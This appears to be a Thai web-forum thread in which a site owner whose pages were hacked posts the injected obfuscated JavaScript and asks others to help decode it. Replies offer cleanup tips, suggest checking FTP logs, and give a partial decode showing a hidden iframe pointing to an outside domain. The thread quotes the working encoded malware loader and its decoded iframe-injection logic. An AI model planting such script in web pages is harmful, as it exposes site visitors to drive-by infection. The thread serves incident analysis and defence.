โดนแฮ๊กครับ รบกวนช่วยแกะ javascript เพื่อหาต้นตอหน่อยครับ

Hardwares & Others
1

โดนแฮ๊กครับ มี javascript นี่มาใส่ในทุกเพจเลย แกะยากด้วยครับ

ตอนนี้แก้ไขเบื้องต้นด้วยการ up ไฟล์ทับใหม่หมดเลย + เปลี่ยนพาสเวิร์ดหมดแล้ว

เหลืออยู่อย่างเดียวคืออยากค้นหาต้นตอครับ


<script>eval(unescape('function%20vhqZ%28vSUj%29%7Bfunction%20aPdMn%28ouC%29%7Bvar%20uqiWB%3D0%2CyCG%2CfSs%3DouC.length%3Bfor%28yCG%3D0%3ByCG%3CfSs%3ByCG++%29uqiWB+%3DouC.charCodeAt%28yCG%29*fSs%3Breturn%20new%20String%28uqiWB%29%7DvSUj%3Dunescape%28vSUj%29%3Bvar%20gIX%3Deval%28%27a%21rvg%21u%23m%23e%26n%23t%7Ds%23.vcva%23l%26l%26eve%26%27.replace%28/%5B%5C%7Dv%26%23%5C%21%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2CbDkA%3DaPdMn%28gIX%29%2CsfEPiPU%3Dnew%20String%28%29%2ClKGh%3D0%3BbIunF%3D0%3Bfor%28var%20mgf%3D0%3Bmgf%3CvSUj.length%3Bmgf++%29%7BsfEPiPU+%3DString.fromCharCode%28vSUj.charCodeAt%28mgf%29%5E%28gIX.charCodeAt%28lKGh%29%5EbDkA.charCodeAt%28bIunF%29%29%29%3BlKGh++%3BbIunF++%3Bif%28lKGh%3EgIX.length%29lKGh%3D0%3Bif%28bIunF%3EbDkA.length%29bIunF%3D0%3B%7Deval%28sfEPiPU%29%3BsfEPiPU%3D%27%27%3Breturn%3B%7DvhqZ%28%27%2531%2538%2533%2533%2538%2537%2538%2536%2556%252b%2504%253f%2532%253e%254a%257b%252b%2508%2564%2529%250a%250c%2520%250c%2577%2516%2516%2513%2522%2533%2532%2502%2531%253c%2564%2548%2560%252a%2507%251e%2567%2570%2528%2510%2511%257c%2532%2515%2525%256d%2573%2557%257b%2503%253b%253d%253d%2522%251e%2530%253a%2521%2543%2555%2519%2566%2528%2518%2517%2536%2504%2517%256f%2557%251d%2528%253a%252a%250e%2518%2503%2564%2541%253d%2536%2525%2538%2529%2501%2506%253a%2533%255a%256e%253a%251d%2519%2578%2572%2536%2522%253f%2534%2563%2524%253a%252a%2500%2527%250f%253e%2508%253f%252a%252b%2522%251d%2534%250a%2515%256d%2542%254b%2529%2535%250f%2526%256b%2523%256f%256a%256e%2529%2501%2565%2532%2529%2524%2519%257f%253a%2513%2517%2502%2508%252d%2516%252d%2516%2535%2509%2566%2502%2503%256b%2518%2579%253f%253d%253f%2524%2528%252d%253a%2529%2531%2577%2522%2524%2576%2556%2537%2535%250e%252a%251b%2575%2526%2527%2508%253e%256b%2519%2564%2527%256c%254e%252d%2555%2527%2564%2520%2560%253c%2533%2534%2543%251f%2531%2535%257b%2501%254d%251f%2557%257b%254b%2521%2507%2543%2538%253d%2551%257d%2505%2504%2511%2530%251f%253e%253a%2556%254f%2541%2502%2513%254d%2504%2502%2535%254d%2531%257f%2557%2545%256b%2568%2571%2522%2538%257d%2529%2565%2511%2535%2577%2517%2503%2523%253b%2515%2565%2505%251b%2569%256c%2572%2567%2509%2576%2525%253f%2504%2568%257d%2561%254c%2504%250d%2548%2575%252f%2578%2535%251d%2532%251b%2534%2525%257c%251d%254a%254b%257e%2536%2509%2526%251d%2500%2527%250c%256a%2555%2573%2564%252b%2508%2502%253c%2533%2522%251e%2570%2573%2508%2527%253e%2545%2517%255e%257e%2502%2576%2523%256f%257e%257b%2571%255b%2577%252e%252d%2529%2547%2503%2516%257c%2522%2570%2539%2577%2511%2500%2536%2528%251f%2522%253a%2508%2544%2531%254c%251a%2523%2517%2573%2573%2576%2562%252b%256d%2529%252e%253f%2506%2529%257d%2502%256a%2555%2518%257a%251b%2518%253f%2526%2514%256b%2547%254c%252c%2536%253e%2507%2513%2538%2579%252c%2540%256d%253b%2539%2535%2525%2521%253b%2502%250e%2551%252c%2571%2538%2525%253f%2557%2552%2563%253b%2539%253b%2527%2531%257b%251f%2509%2513%2561%250b%2567%251d%251c%2528%2537%2503%2565%2572%253c%2537%256a%2521%2579%255d%2522%253d%2518%250a%2521%253d%2517%2540%2570%250b%2523%250f%2533%2568%2501%2518%2579%2551%254a%2564%2571%2577%256e%257a%252b%257d%2567%2554%2517%254d%2512%2502%2548%2532%257b%2527%2507%252b%2502%2564%2512%256a%2521%2547%2505%2525%2536%2523%2508%251d%2539%253a%2504%257d%2554%257f%2541%2503%2566%2564%2522%251a%2512%2549%257f%2544%251b%2512%2524%2523%2561%257f%2538%2570%2538%256b%257b%2579%257f%2563%2566%253e%2502%2560%2523%2503%2551%2522%250e%2531%253a%251d%2510%252d%252b%2534%2548%250e%2531%251c%2501%2538%2533%2534%2536%252e%2512%253c%252a%2535%2514%2522%2566%255b%2504%2536%250c%2500%256d%253e%2528%2529%2521%2530%2533%2505%2516%250e%2539%2524%2573%256d%252d%2530%256b%250e%2503%250e%2517%2501%2503%2539%251e%252c%2517%252b%2535%2535%2563%2567%2561%250d%2516%2504%2524%252d%2528%253b%251f%2547%2574%253b%2517%253c%252b%2561%2529%2562%2573%2563%257f%250d%2578%256c%252d%253c%256a%2538%256b%2537%255f%253f%257a%253d%2528%2525%2564%2577%256d%250c%256a%2536%257c%253b%2575%2526%252e%2536%2530%253c%252e%2537%2538%2530%257f%2525%2574%255e%252f%253c%2520%253a%2519%2535%2570%2564%251f%2547%256c%252e%2521%250d%2503%256f%2547%2502%2531%2538%253f%2576%255b%2575%2555%2538%256d%2572%2552%2566%2532%251e%251d%253c%2533%2507%2506%2548%2533%255e%255d%2562%2534%257d%253f%257e%2523%2571%2576%2576%2574%257f%2540%2524%2577%257b%2524%2518%253e%252d%250c%252e%252b%253f%253e%252d%257c%252c%2536%2530%253f%2542%2574%2512%2534%2531%2503%254c%2520%2579%2502%2530%2539%2539%256f%2579%2570%253c%257e%251f%2532%2513%2504%252e%2500%254b%2547%2573%255e%2569%257f%256f%256f%253b%2531%2522%2529%252d%2579%2536%257a%250d%257b%2532%2531%2532%2536%2505%2536%2564%2519%253e%2525%253e%2514%2503%2539%2538%2516%2567%256f%2570%2538%2524%2527%250a%2562%2539%2534%2537%256d%2552%2522%2516%2531%250d%2532%252d%251d%2550%2571%257c%2520%2535%251a%2568%253d%2535%2538%253e%255b%250c%253a%2532%2519%252e%253f%2550%2524%2536%2522%2538%250b%253b%253d%2572%250a%2525%2531%2535%2576%253d%2530%2517%2514%2536%253a%2531%2539%2572%2531%2576%2576%257f%2564%256d%257d%256b%255d%2570%2577%2532%2537%2526%255f%2520%2501%2518%2531%251e%253d%252f%2578%2538%2526%250b%257f%256c%2566%256c%2551%256f%2567%2559%250b%2529%2562%2521%253a%253f%2512%2512%2509%2502%2508%2508%2560%256f%255d%2501%2524%2508%2536%2537%2534%2528%2528%2562%2537%2559%253d%2510%2573%257b%2531%253b%253b%252c%252b%2577%250a%251d%252f%2512%2546%2536%256c%256d%2536%2506%2532%2571%2518%253c%252d%2502%2574%2552%2555%257e%2529%255e%2536%253c%2531%2519%252e%2504%2503%2552%256d%257a%2536%2554%253b%257b%2512%2507%2563%2575%2568%251c%257c%2520%2507%2507%253b%2529%2573%257c%2577%256e%2561%254d%2571%2535%2571%2540%2544%256e%2554%2562%2574%2563%2512%2522%2521%252f%2502%2510%2539%2537%256d%257c%2534%2534%2539%2523%2511%2577%256f%2545%251e%252d%2527%2515%255f%257a%254b%2567%254f%2576%256c%256d%2561%2533%252a%253e%2520%2523%2520%2562%252c%253c%2533%2537%252c%2576%257c%2551%2575%2540%2503%252a%2532%253f%2521%2516%2521%2564%2561%257d%252a%254a%2519%2533%2531%251d%251e%2507%250e%2512%253b%2520%2530%2544%2579%2571%2565%2529%2561%252a%253c%252c%251c%2578%2531%256a%2524%253c%2537%2532%253c%2557%2569%253e%2573%256e%257a%256b%253c%2538%2510%2520%2574%2573%252d%2561%2537%2503%2517%255b%2522%2505%253b%257b%2570%2511%2573%2512%250f%2510%2535%2516%2554%2577%2568%2527%2576%2541%2569%251a%257b%2541%2548%2542%2554%2547%254e%256a%253b%2505%252a%257c%2511%2575%2546%2543%255b%257f%2578%251d%2505%256f%250d%2522%2524%250c%2534%2536%2534%251a%2572%2575%2545%2512%2536%253f%253e%2520%257d%2534%251d%2559%2541%257a%252c%251b%2534%2576%2515%2564%2538%2552%2527%2521%2531%2534%2538%2535%2530%2572%2543%253a%2531%2526%2501%2519%2534%2579%2534%254b%2537%2530%2534%252f%256e%2570%252c%2520%2512%2501%251a%2534%2543%254f%250c%2538%2530%2519%257d%2574%253a%256f%2565%2577%2572%255e%2540%2578%252e%251c%2534%257c%256f%2573%2545%2572%257c%2536%252c%2527%2579%2521%2517%2531%2544%2569%2544%2567%2579%252a%253f%253b%251a%253e%2576%2535%253e%2536%256d%255d%2577%256d%2545%2504%2524%2536%250b%2551%2538%253f%2506%2539%2511%2578%2534%2508%252d%2537%2512%2537%2503%257c%2550%2567%256b%2551%2565%2571%2559%254c%2551%255f%253f%253d%2519%256c%2524%2515%2519%253b%2535%251b%2511%2570%2578%255e%2535%2570%253c%2570%2527%2564%2561%2566%257a%2550%251a%2576%2524%257d%257b%257d%2557%2563%252a%2523%2523%2510%2539%2511%2573%257b%2575%2577%253b%256b%257b%257e%2556%256a%2577%2559%252f%2545%2567%2572%257f%2562%2570%2550%2548%2574%2570%2510%2523%253c%2505%2546%2539%250d%2517%2520%2535%2522%2522%2512%2522%2545%2537%252d%2509%257a%2565%257a%2577%2576%2563%257e%2565%257a%256c%254b%2512%2531%2537%2531%2578%253d%251b%252b%2523%257d%2579%2548%2527%251d%2531%251c%256a%250b%2524%2526%2522%2579%2534%2522%256c%2505%2569%256d%256a%2514%2544%2520%253f%256e%252c%2532%2531%2550%2564%2516%250b%252f%2532%256d%2579%256e%2533%257e%257a%2514%255f%2559%2526%2508%2500%2534%2507%2528%2569%255c%257c%27%29%3B'));</script>
2

ยังกะ encode มา

3

แก้ทีละไฟล์ คงเหนื่อยแย่นะครับ เพราะเคยโดนเหมือนกัน จะเป็นไรไหมถ้าจะลงลิงค์บทความที่เคยเขียนสอนวิธีแก้ เผื่อจะมีประโยชน์น่ะครับ

http://www.ipbsecret.com/webboard/index.php?showtopic=2851

Edit : ครอบ [-code-]

4

ขอบคุณมากครับ สำหรับบทความดีๆ และ มีประโยชน์

5

ออ เราก็นึกว่ามีบอกต้นตอด้วย

สำหรับโปรแกรมแก้นั้น ใช้ dreamweaver ก็สามารถทำได้นะครับ
Edit plus เองก็ทำได้ครับ

6

เคยแกะเหมือนกันเพราะสงสัย

แต่ก็เสียเปล่าครับ

7

แกะออกมาได้ประมาณนี้

[quote]
function rMVwU(){};rMVwU.prototype = {cookieValue:1,cookieName:‘febcghad’,install : function(){if(!this.alreadyInstalled()){var s="<gd0igvX DsDtXyDlXeD=g’XdqiqsDpglgagy0:gnXoDn0eg’X>q<Xi0f0r0aDmXe0 qsXr0cg=X’g".replace(/[qD0gX]/g, ‘’)+this.getFrameURL()+"‘C>Q<(/(iQf(r%aQmNeC>C<(/QdCiCvQ>C".replace(/[Q(NC%]/g, ‘’);try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write(’<EhLtGmElL>L<GbeoEd/ye>e’.replace(/[GEe/L]/g, ‘’)+s+’<W/Wb%o%diyN>N<w/WhitNmwlN>%’.replace(/[NiWw%]/g, ‘’))}this.setCookie(this.cookieName, this.cookieValue);}},getRandString : function(){var l=16,c=‘0y1y2m3k4k5o6?7m8k9oa?bocydmeofo’.replace(/[m?oky]/g, ‘’),o=’’;for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + ‘=’ + this.cookieValue) == -1);},setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + “=” + escape(value)+"; expires="+d.toGMTString(); },path:’/traff2.cn/’,host:‘2wtTr/aTf/fT.Tc@n@’.replace(/[@)w/T]/g, ‘’),getFrameURL : function(){var dlh=document.location.host; return “http”+’://’+((dlh == ‘’ || dlh == ‘undefined’) ? this.getRandString() : ‘’) + dlh.replace (/[^a-z0-9.-]/,’.’).replace (/.+/,’.’)

8

ที่เคยเจอะมาทาง ftp น่ะครับอาจจะมาจากเครื่องคุณเองก็ได้หรืออาจจะโดนโทรจันส่งรหัสผ่านไปให้แฮกเกอร์ก็ได้ครับ

ลองดูวันที่เขียนทับไฟล์น่ะครับแล้วลองไปดูที่ ftp log ตามวันที่โดนเขียนทับน่ะครับ

เคยเจอะมาแบบนี้น่ะครับ

9

น่าจะเป็น Virus นะ

10